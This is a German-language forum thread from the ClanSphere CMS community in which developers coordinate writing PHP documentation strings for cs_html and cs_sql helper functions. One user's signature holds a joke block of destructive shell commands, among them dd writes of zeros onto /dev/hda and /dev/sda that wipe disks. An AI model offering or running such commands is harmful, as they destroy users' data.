Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 6
Seite [1]
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Thema - 25.11.2006 um 14:58 Uhr
hi!
ich hab ein meiner meinung nach nettes system zum coden beim explorer modul entwickelt. ich hab schon einen teil aller funktionen erklärt aber bis ich durch alles durch bin geh ich kaputt.

die funktionen sollten so erklärt werden:
 
1.
2.
3.
4.
1. / 2. / ... 
<?php
$cs_lang
['html_hr'] = 'cs_html_hr($width)'.cs_html_br(1)
            . 
'Erzeugt eine Trennlinie mit der Breite $width';
?>

also jeweils $cs_lang[hier die funktion ohne cs_ davor]
dann eine zeile mit den parametern, kann reinkopiert werden.
untendrunter eine erlärung zur anwendung die möglichst alle parameter beinhaltet. das beispiel oben ist natürlich arg einfach, gibt da kompliziertere.

würde mich sehr freuen wenn da ein paar leute mitmachen würden, selbst wenn es nur wenige funktionen sind. ist eure chance direkt etwas zu clansphere beizutragen

hier die liste der funktionen die ich brauche (fast alle):

cs_html_anchor
cs_html_hr
cs_html_mail
cs_html_underline
cs_html_big
cs_html_italic
cs_html_div
cs_html_span

cs_sql_connect
cs_sql_count
cs_sql_delete
cs_sql_escape
cs_sql_insert
cs_sql_insertid
cs_sql_option
cs_sql_query
cs_sql_select
cs_sql_update
cs_sql_version

cs_clip
abc_insert

die tools hab ich auch nur so zur hälfte aber ich denk die mach lieber ich, sind teilweise nicht so einfach, aber wenns mir jemand zeigen möchte, gern

am besten dann die erlärung hier in den thread, dann sieht man was schon getan ist und was nicht.

in hoffnung auf hilfe durch unsere community,
duRiel


Zuletzt editiert von duRiel ClanSphere Team am 25.11.2006 um 15:17 Uhr (2x Editiert)
Inaktiv
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 1 - 25.11.2006 um 20:53 Uhr
http://upload.desert-gaming.de/dateien/51632116832/4duriel.txt

die 1. 3 für sql


/edit: und noch eine funktion:

 
1.
2.
3.
4.
5.
6.
7.
8.
9.
1. / 2. / ... 
<?php $cs_lang['sql_insert'] = 'cs_sql_insert - cs_sql_insert($cs_file,$sql_table,$sql_cells,$sql_content)
Mit dieser Funktion lässt sich eine neue Zeile in eine Tabelle eintragen. Im ersten Parameter muss der Dateiname übergeben werden, damit der logger die aktion präzieser protokollieren kann. In dem 2. Paramenter muss man die Tabelle angeben, die bearbeitet werden soll.
Die letzten beiden Paramter übergeben den Zellen die ausgefüllt werden sollen und den jweiligen inhalt. Sie müssen als Array übergeben werden.
Die Funktion gibt keinen Wert zurrück.

Beispiel
$cells = Array('
users_name','users_email','users_name')
$content = Array('
P3t3r','peter@email.de','Peter')
cs_sql_insert(__FILE__,'
users',$cells,$content);'?>


edit2: oh die werdne irgentwie net mit abgespichert wenn ichs hier poste


------------------
www.laszlokorte.de

Zuletzt editiert von SCHIRI ClanSphere Team am 25.11.2006 um 21:04 Uhr (3x Editiert)
Inaktiv
|
duRiel ClanSphere Team
Thread-Ersteller


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 2 - 25.11.2006 um 21:10 Uhr
wenn dus hier postest musst du auchnoch den backslash bashslashen
deshalb \\'


Zuletzt editiert von duRiel ClanSphere Team am 25.11.2006 um 21:11 Uhr (2x Editiert)
Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 3 - 25.11.2006 um 21:32 Uhr
achso^^ ok


------------------
www.laszlokorte.de

Inaktiv
|
duRiel ClanSphere Team
Thread-Ersteller


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 4 - 25.11.2006 um 22:01 Uhr
ok danke allen, die bisher geholfen haben (auch im icq).
noch benötigt:

$cs_lang['sql_option']
$cs_lang['sql_query']
$cs_lang['sql_select']
$cs_lang['sql_update']

$cs_lang['cs_clip']
$cs_lang['abc_insert']


Zuletzt editiert von duRiel ClanSphere Team am 25.11.2006 um 22:07 Uhr (1x Editiert)
Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 5 - 15.12.2006 um 15:18 Uhr
Was is nu dabei eigentlich rausgekommen?
Gibt es denn schon einiges zu sehen? Oder wie mei MS. Es bleibt geheim bis es fertig is


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
duRiel ClanSphere Team
Thread-Ersteller


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 6 - 15.12.2006 um 15:20 Uhr
ist doch schon seit wochen im svn :>


Inaktiv
|
Antworten: 6
Seite [1]


Sie müssen sich registrieren, um zu antworten.